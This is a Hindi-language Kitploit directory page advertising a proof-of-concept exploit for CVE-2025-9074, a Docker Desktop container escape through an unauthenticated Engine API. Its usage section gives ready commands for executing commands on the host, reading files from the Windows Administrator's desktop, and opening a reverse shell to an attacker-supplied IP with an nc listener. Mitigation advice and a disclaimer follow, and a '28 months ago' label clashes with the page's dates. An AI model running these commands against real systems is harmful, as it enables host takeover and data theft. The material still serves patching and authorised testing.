Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-9074-Docker-Desktop-Container-Escape — CVE-2025-9074 के लिए प्रूफ ऑफ कॉन्सेप्ट एक्सप्लॉइट - अनप्रमाणित Docker Engine API कंटेनर एस्केप जो Windows और macOS पर Docker Desktop < 4.44.3 को प्रभावित करता है (CVSS 9.3) | Kitploit
उपकरण/GitHubGitHub/ptechamanja/cve-2025-9074-docker-desktop-container-escape
कंटेनर सुरक्षाभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगक्लाउड सुरक्षारेड टीमिंगकंटेनर एस्केप
GitHubptechamanja/cve-2025-9074-docker-desktop-container-escape

CVE-2025-9074-Docker-Desktop-Container-Escape

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-9074 के लिए प्रूफ ऑफ कॉन्सेप्ट एक्सप्लॉइट - अनप्रमाणित Docker Engine API कंटेनर एस्केप जो Windows और macOS पर Docker Desktop < 4.44.3 को प्रभावित करता है (CVSS 9.3)

रिपॉजिटरी देखें
28 महीने पहलेअभी तक समीक्षित नहीं

CVE-2025-9074: Docker Desktop कंटेनर एस्केप PoC

CVE CVSS Platform

CVE-2025-9074 के लिए प्रूफ ऑफ कॉन्सेप्ट एक्सप्लॉइट - Docker Desktop में एक महत्वपूर्ण कंटेनर एस्केप भेद्यता जो Docker Engine API तक अनधिकृत पहुंच की अनुमति देती है।

भेद्यता अवलोकन

गुणमान
CVE IDCVE-2025-9074
CVSS स्कोर9.3 (गंभीर)
प्रभावित सॉफ्टवेयरDocker Desktop < 4.44.3
प्रभावित प्लेटफॉर्मWindows, macOS (Linux प्रभावित नहीं)
निश्चित संस्करणDocker Desktop 4.44.3+
खोजकर्ताFelix Boulet, Philippe Dugré
खोज की तिथिमध्य-2025
पैच तिथि20 अगस्त, 2025

तकनीकी विवरण

यह भेद्यता Docker Desktop पर चलने वाले कंटेनरों को http://192.168.65.7:2375 पर Docker Engine API तक प्रमाणीकरण के बिना पहुंचने की अनुमति देती है। यह निम्नलिखित की परवाह किए बिना होता है:

  • Enhanced Container Isolation (ECI) सेटिंग्स
  • "Expose daemon on tcp://localhost:2375 without TLS" कॉन्फ़िगरेशन
  • कोई अन्य सुरक्षा सेटिंग्स

प्रभाव

  • Windows (WSL बैकएंड): प्रशासनिक विशेषाधिकारों के साथ पूर्ण होस्ट अधिग्रहण
  • macOS: कंटेनर हेरफेर और संभावित बैकडोरिंग (उपयोगकर्ता संकेतों द्वारा सीमित)
  • Linux: संवेदनशील नहीं (TCP के बजाय Unix सॉकेट का उपयोग करता है)

मूल कारण

Docker Engine API को एक TCP सॉकेट पर उजागर किया गया था जो कंटेनरों के अंदर से सुलभ था, जिससे अनुमति मिली:

  • कंटेनर बनाना/हटाना
  • होस्ट फाइलसिस्टम माउंट करना
  • विशेषाधिकार प्राप्त कमांड निष्पादित करना
  • कंटेनर अलगाव का पूर्ण उल्लंघन

उपयोग

चित्र

पूर्वापेक्षाएँ

root@kitploit:~
pip3 install requests

कमांड निष्पादन मोड

root@kitploit:~
# Execute a command on the host
python3 exploit.py -u http://192.168.65.7:2375 -m cmd -c "whoami"

# Read files from Windows host
python3 exploit.py -u http://192.168.65.7:2375 -m cmd -c "cat /hostfs/mnt/c/Users/Administrator/Desktop/root.txt"

# List users on Windows
python3 exploit.py -u http://192.168.65.7:2375 -m cmd -c "ls -la /hostfs/mnt/c/Users"

रिवर्स शेल मोड

root@kitploit:~
# Terminal 1: Set up listener
nc -lvnp 4444

# Terminal 2: Execute exploit
python3 exploit.py -u http://192.168.65.7:2375 -m reverse -l <YOUR_IP> -p 4444

# Once connected, host filesystem is at: /hostfs

कंटेनर के अंदर से

root@kitploit:~
# If you already have access to a container
curl http://192.168.65.7:2375/version

हमला परिदृश्य

root@kitploit:~
graph TD
    A[Malicious Container] -->|No Auth Required| B[Docker Engine API<br/>192.168.65.7:2375]
    B -->|Create Container| C[Privileged Container]
    C -->|Mount Host FS| D[Full Host Access]
    D -->|Read/Write| E[Compromise System]

शमन

तत्काल कार्रवाई आवश्यक

तुरंत Docker Desktop 4.44.3 या बाद के संस्करण में अपडेट करें।

root@kitploit:~
# Check your Docker Desktop version
docker --version

# Update Docker Desktop
# Windows: Download from https://desktop.docker.com/win/main/amd64/Docker%20Desktop%20Installer.exe
# macOS: Download from https://desktop.docker.com/mac/main/amd64/Docker.dmg

वर्कअराउंड (अस्थायी)

यदि तत्काल अपडेट संभव नहीं है:

  1. अविश्वसनीय कंटेनर चलाने से बचें
  2. कंटेनरों से नेटवर्क कनेक्शन की निगरानी करें
  3. नेटवर्क विभाजन लागू करें
  4. तैनाती से पहले सभी कंटेनर इमेज की समीक्षा करें

संदर्भ

  • Docker सुरक्षा सलाह
  • NVD CVE-2025-9074
  • Felix Boulet का ब्लॉग
  • Philippe Dugré का विश्लेषण
  • GitHub सलाह

अस्वीकरण

यह उपकरण केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है।

  • केवल उन प्रणालियों के विरुद्ध उपयोग करें जिनके आप मालिक हैं या परीक्षण करने की स्पष्ट अनुमति है
  • कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है
  • लेखक इस सॉफ्टवेयर के दुरुपयोग के लिए कोई देयता नहीं मानते हैं

क्रेडिट

  • भेद्यता खोज: Felix Boulet, Philippe Dugré
  • PoC विकास: Amanja Francisco
  • Docker सुरक्षा टीम: त्वरित प्रतिक्रिया और पैच के लिए

लाइसेंस

MIT लाइसेंस - विवरण के लिए LICENSE फ़ाइल देखें

टूल डाउनलोड करें